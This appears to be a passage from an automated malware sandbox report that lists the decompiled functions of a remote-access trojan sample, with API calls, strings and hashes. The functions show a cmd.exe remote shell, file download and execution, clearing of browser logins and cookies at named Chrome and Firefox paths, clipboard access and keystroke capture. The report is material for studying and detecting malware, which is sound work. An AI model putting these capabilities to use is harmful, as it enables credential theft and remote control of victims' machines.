                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                  • API String ID: 1385304114-1507758755
                                                                                  • Opcode ID: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
                                                                                  • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                                                                  • Opcode Fuzzy Hash: 9562a3d966e66de215cd70958b56b0286d998ffc789974a8c60729faf031d709
                                                                                  • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                                                                  Function 0040567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • __Init_thread_footer.LIBCMT ref: 00405703
                                                                                  • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                                  • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                                  • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                                  • CloseHandle.KERNEL32 ref: 00405A03
                                                                                  • CloseHandle.KERNEL32 ref: 00405A0B
                                                                                  • CloseHandle.KERNEL32 ref: 00405A1D
                                                                                  • CloseHandle.KERNEL32 ref: 00405A25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                  • String ID: SystemDrive$cmd.exe
                                                                                  • API String ID: 2994406822-3633465311
                                                                                  • Opcode ID: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                                                                  • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                                                                  • Opcode Fuzzy Hash: 4568db86e005e5ee8b267df344be70a7839f6dd1d3c8f420728b284f3f3e7f32
                                                                                  • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                                                                  Function 0040AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AC53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                  • API String ID: 1164774033-3681987949
                                                                                  • Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                                  • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                                                                  • Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                                  • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                                                                  Function 0040AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AE11
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  • API String ID: 3527384056-432212279
                                                                                  • Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                                  • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                                                                  • Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                                  • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                                                                  Function 00414EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenClipboard.USER32 ref: 00414EC2
                                                                                  • EmptyClipboard.USER32 ref: 00414ED0
                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                  • String ID:
                                                                                  • API String ID: 3520204547-0
                                                                                  • Opcode ID: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                                  • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                                                                  • Opcode Fuzzy Hash: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                                  • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                                                                  Function 0041A01B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 2341273852-4028850238
                                                                                  • Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                                  • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                                                                  • Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                                  • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                                                                  Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                                  • API String ID: 0-3177665633
                                                                                  • Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                                  • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                                                                  • Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                                  • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                                                                  Function 004186FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                                                                  • GetLastError.KERNEL32 ref: 00418771
                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                  • String ID:
                                                                                  • API String ID: 3587775597-0
                                                                                  • Opcode ID: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                                  • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                                                                  • Opcode Fuzzy Hash: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                                  • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                                                                  Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                  • API String ID: 1164774033-405221262
                                                                                  • Opcode ID: a62fe0bec1422817c3559ce599887c55a7de2d38d2807c2cce20253f1fdbfdfa
                                                                                  • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                                                                  • Opcode Fuzzy Hash: a62fe0bec1422817c3559ce599887c55a7de2d38d2807c2cce20253f1fdbfdfa
                                                                                  • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                                                                  Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                  • API String ID: 2127411465-314212984
                                                                                  • Opcode ID: 0ba8629cbc95ab7c94c70a1996e8cb2f52f1a2c937a1ac7848cb4dd884e1c605
                                                                                  • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                                                                  • Opcode Fuzzy Hash: 0ba8629cbc95ab7c94c70a1996e8cb2f52f1a2c937a1ac7848cb4dd884e1c605
                                                                                  • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                                                                  Function 004466BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00446741
                                                                                  • _free.LIBCMT ref: 00446765
                                                                                  • _free.LIBCMT ref: 004468EC
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                  • _free.LIBCMT ref: 00446AB8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                  • String ID:
                                                                                  • API String ID: 314583886-0
                                                                                  • Opcode ID: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
                                                                                  • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                                                                  • Opcode Fuzzy Hash: 15cc721bf36b345a005cee04ee4ee66227f187e3f0d332304a3991bd3da22e63
                                                                                  • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                                                                  Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                                                                                  • GetLastError.KERNEL32 ref: 0040A999
                                                                                  Strings
                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                                                                                  • [Chrome StoredLogins not found], xrefs: 0040A9B3
                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                                                                                  • UserProfile, xrefs: 0040A95F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteErrorFileLast
                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                  • API String ID: 2018770650-1062637481
                                                                                  • Opcode ID: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                                  • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                                                                                  • Opcode Fuzzy Hash: e2dc748f8a2f2c202dc5dfde2945bc6c5171a76981be289e4bc3f19e588866b0
                                                                                  • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                                                                                  Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                                                                  • GetLastError.KERNEL32 ref: 00415CDB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 3534403312-3733053543
                                                                                  • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                  • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                                                                                  • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                                                                                  • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                                                                                  Function 004513D4 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: 55060fc50cc461eae68284812f2cd57c1090fcceb7df0db447f8036b4474b42f
                                                                                  • Instruction ID: 053c4da9c4e9401cc5e8c6747fb67a0461d28ab3294dbb24078e68a968df4fbd
                                                                                  • Opcode Fuzzy Hash: 55060fc50cc461eae68284812f2cd57c1090fcceb7df0db447f8036b4474b42f
                                                                                  • Instruction Fuzzy Hash: 74C26D71E046288FDB25CE28DD407EAB3B5EB45306F1441EBD80DE7252E778AE898F45
                                                                                  Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408393
                                                                                    • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                                                                                    • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                                                                    • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                                                                    • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                                                                  • FindClose.KERNEL32(00000000), ref: 004086F4
                                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                  • String ID:
                                                                                  • API String ID: 1824512719-0
                                                                                  • Opcode ID: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                                  • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                                                                  • Opcode Fuzzy Hash: 2d04ef65f79b6d4a761471fa0904ac1a104409f79b1bf8440fe588cad0436fe0
                                                                                  • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                                                                  Function 00410763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                                                                                  • GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E
                                                                                    • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F
                                                                                    • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
                                                                                    • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3950776272-0
                                                                                  • Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                                  • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                                                                                  • Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
                                                                                  • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                                                                                  Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                  • GetKeyState.USER32(00000010), ref: 004094B8
                                                                                  • GetKeyboardState.USER32(?), ref: 004094C5
